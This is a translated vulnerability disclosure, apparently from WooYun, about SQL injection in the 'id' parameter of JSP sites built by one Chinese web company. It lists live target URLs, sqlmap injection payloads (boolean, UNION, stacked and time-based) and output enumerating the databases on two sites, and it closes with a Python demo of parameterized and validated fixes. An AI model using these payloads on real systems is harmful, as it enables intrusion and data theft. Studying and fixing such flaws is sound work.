2014-11-13: Actively contacting the vendor and waiting for the vendor to claim the report; details are not disclosed publicly.
2015-02-11: The vendor has chosen to ignore the vulnerability; details are disclosed to the public.
Continuing where a certain expert left off.
I found that most of the websites this company builds are JSP, with only a handful in ASPX; even the corporate sites are JSP. A site-building company this distinctive and unconventional, with this many affected sites, is rare in China. Official site: http://www.xiaheng.net/
http://wooyun.org/bugs/wooyun-2014-071836
The parameter in that earlier report was: XID
Examples are as follows:
http://www.shbo-xun.com/list.jsp?id=2
http://www.yihengkx.com/list.jsp?id=2
http://www.aohaosiyq.com/list.jsp?id=2
http://jingkeleici.com/list.jsp?id=2
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2 AND 9892=9892

    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: id=-1696 UNION ALL SELECT NULL, CHAR(58)+CHAR(99)+CHAR(117)+CHAR(110)+CHAR(58)+CHAR(86)+CHAR(122)+CHAR(90)+CHAR(84)+CHAR(122)+CHAR(116)+CHAR(66)+CHAR(67)+CHAR(72)+CHAR(97)+CHAR(58)+CHAR(116)+CHAR(100)+CHAR(108)+CHAR(58), NULL,NULL, NULL, NULL, NULL, NULL--

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: id=2; WAITFOR DELAY '0:0:5';--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=2 WAITFOR DELAY '0:0:5'--
---
[19:43:45] [INFO] testing MySQL
[19:43:45] [WARNING] the back-end DBMS is not MySQL
[19:43:45] [INFO] testing Oracle
[19:43:45] [WARNING] the back-end DBMS is not Oracle
[19:43:45] [INFO] testing PostgreSQL
[19:43:46] [WARNING] the back-end DBMS is not PostgreSQL
[19:43:46] [INFO] testing Microsoft SQL Server
[19:43:46] [INFO] confirming Microsoft SQL Server
[19:43:46] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: Apache 2.2.2, JSP
back-end DBMS: Microsoft SQL Server 2000
[19:43:46] [INFO] fetching database names
[19:43:46] [INFO] the SQL query used returns 16 entries
[19:43:47] [INFO] retrieved: "agency5"
[19:43:47] [INFO] retrieved: "chinanewspaper"
[19:43:47] [INFO] retrieved: "hetang"
[19:43:47] [INFO] retrieved: "master"
[19:43:47] [INFO] retrieved: "model"
[19:43:47] [INFO] retrieved: "msdb"
[19:43:47] [INFO] retrieved: "newspaper"
[19:43:47] [INFO] retrieved: "Northwind"
[19:43:48] [INFO] retrieved: "pubs"
[19:43:48] [INFO] retrieved: "tempdb"
[19:43:48] [INFO] retrieved: "xfsztdb"
[19:43:48] [INFO] retrieved: "xiren16sjk"
[19:43:48] [INFO] retrieved: "xiren17sjk"
[19:43:48] [INFO] retrieved: "xiren1sjk"
[19:43:48] [INFO] retrieved: "xiren2sjk"
[19:43:48] [INFO] retrieved: "xiren3sjk"
available databases [16]:
[*] agency5
[*] chinanewspaper
[*] hetang
[*] master
[*] model
[*] msdb
[*] newspaper
[*] Northwind
[*] pubs
[*] tempdb
[*] xfsztdb
[*] xiren16sjk
[*] xiren17sjk
[*] xiren1sjk
[*] xiren2sjk
[*] xiren3sjk
[19:43:48] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandled occurances will result in replacement with '?' character. Please, find proper character representation inside corresponding output files.
[19:43:48] [INFO] fetched data logged to text files under 'C:\DOCUME~1\ADMINI~1\??\??\SQLMAP~1\SQLMAP~1\Bin\output\www.shbo-xun.com'

Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2 AND 9167=9167

    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: id=-9735 UNION ALL SELECT NULL, NULL, CHAR(58)+CHAR(114)+CHAR(113)+CHAR(117)+CHAR(58)+CHAR(121)+CHAR(98)+CHAR(121)+CHAR(119)+CHAR(67)+CHAR(85)+CHAR(76)+CHAR(72)+CHAR(120)+CHAR(86)+CHAR(58)+CHAR(107)+CHAR(98)+CHAR(108)+CHAR(58), NULL, NULL, NULL, NULL, NULL--

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: id=2; WAITFOR DELAY '0:0:5';--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=2 WAITFOR DELAY '0:0:5'--
---
[19:45:11] [INFO] testing MySQL
[19:45:12] [WARNING] the back-end DBMS is not MySQL
[19:45:12] [INFO] testing Oracle
[19:45:12] [WARNING] the back-end DBMS is not Oracle
[19:45:12] [INFO] testing PostgreSQL
[19:45:12] [WARNING] the back-end DBMS is not PostgreSQL
[19:45:12] [INFO] testing Microsoft SQL Server
[19:45:12] [INFO] confirming Microsoft SQL Server
[19:45:13] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: Apache 2.2.2, JSP
back-end DBMS: Microsoft SQL Server 2000
[19:45:13] [INFO] fetching database names
[19:45:13] [INFO] the SQL query used returns 18 entries
[19:45:13] [INFO] retrieved: "master"
[19:45:13] [INFO] retrieved: "model"
[19:45:13] [INFO] retrieved: "msdb"
[19:45:13] [INFO] retrieved: "Northwind"
[19:45:13] [INFO] retrieved: "pubs"
[19:45:14] [INFO] retrieved: "survey"
[19:45:14] [INFO] retrieved: "sztdb"
[19:45:14] [INFO] retrieved: "tempdb"
[19:45:14] [INFO] retrieved: "xiren11sjk"
[19:45:14] [INFO] retrieved: "xiren12sjk"
[19:45:14] [INFO] retrieved: "xiren13sjk"
[19:45:14] [INFO] retrieved: "xiren14sjk"
[19:45:14] [INFO] retrieved: "xiren15sjk"
[19:45:14] [INFO] retrieved: "xiren4sjk"
[19:45:15] [INFO] retrieved: "xiren5sjk"
[19:45:15] [INFO] retrieved: "xiren6sjk"
[19:45:15] [INFO] retrieved: "xiren7sjk"
[19:45:15] [INFO] retrieved: "xiren8sjk"
available databases [18]:
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] survey
[*] sztdb
[*] tempdb
[*] xiren11sjk
[*] xiren12sjk
[*] xiren13sjk
[*] xiren14sjk
[*] xiren15sjk
[*] xiren4sjk
[*] xiren5sjk
[*] xiren6sjk
[*] xiren7sjk
[*] xiren8sjk
[19:45:15] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandled occurances will result in replacement with '?' character. Please, find proper character representation inside corresponding output files.
[19:45:15] [INFO] fetched data logged to text files under 'C:\DOCUME~1\ADMINI~1\??\??\SQLMAP~1\SQLMAP~1\Bin\output\www.yihengkx.com'
Fix: filter the input.
Unable to contact the vendor, or the vendor actively refused.
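To make the fix concrete, here is an added example (not code from the report or from the vendor) that reproduces the boolean-based blind condition sqlmap reported for the `id` parameter and shows the two defenses that close it: binding the value as a query parameter, and validating that `id` is a plain integer before it reaches the database. It uses an in-memory SQLite table as a stand-in for the real Microsoft SQL Server 2000 backend (the article table, its rows and the function names are assumptions; the `AND 9892=9892` condition is the one from the sqlmap output above, and only the boolean probe is used because the T-SQL `WAITFOR DELAY` payloads have no SQLite equivalent).

```python
import sqlite3

# Constructed sample data standing in for the site's article table.
# The real schema behind list.jsp is not on the page; this is an assumption.
ROWS = [(1, "About us"), (2, "News"), (3, "Contact")]


def _connect():
    """Fresh in-memory database so every call starts from the same state."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE article (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO article VALUES (?, ?)", ROWS)
    return conn


def list_vulnerable(raw_id):
    """The pattern behind list.jsp?id=: the raw parameter is pasted into the SQL text.

    A true condition appended to the id ("2 AND 9892=9892") returns the same row as
    id=2, a false one ("2 AND 9892=9893") returns nothing. That difference in the
    response is the oracle sqlmap's boolean-based blind technique relies on.
    """
    conn = _connect()
    sql = "SELECT id, title FROM article WHERE id=" + raw_id
    return conn.execute(sql).fetchall()


def list_parameterized(raw_id):
    """Binding alone: the whole parameter is compared as a single value, so
    '2 AND 9892=9892' is just a string that matches no integer id."""
    conn = _connect()
    return conn.execute(
        "SELECT id, title FROM article WHERE id=?", (raw_id,)
    ).fetchall()


def list_fixed(raw_id):
    """Defense in depth: reject anything that is not a non-negative integer,
    then bind the parsed integer as a parameter."""
    if not raw_id.isdigit():
        raise ValueError("id must be a non-negative integer")
    conn = _connect()
    return conn.execute(
        "SELECT id, title FROM article WHERE id=?", (int(raw_id),)
    ).fetchall()


if __name__ == "__main__":
    print("vulnerable, true probe :", list_vulnerable("2 AND 9892=9892"))
    print("vulnerable, false probe:", list_vulnerable("2 AND 9892=9893"))
    print("parameterized, probe   :", list_parameterized("2 AND 9892=9892"))
    print("fixed, normal id       :", list_fixed("2"))
```

Running it shows the true and false probes producing different results from `list_vulnerable`, which is exactly the signal sqlmap used to enumerate database names; `list_parameterized` returns no rows for the probe because the bound value never becomes SQL syntax, and `list_fixed` refuses the probe before any query is sent. In the JSP code the equivalent change is `PreparedStatement` with `setInt` instead of string concatenation, plus an `Integer.parseInt` check on the request parameter.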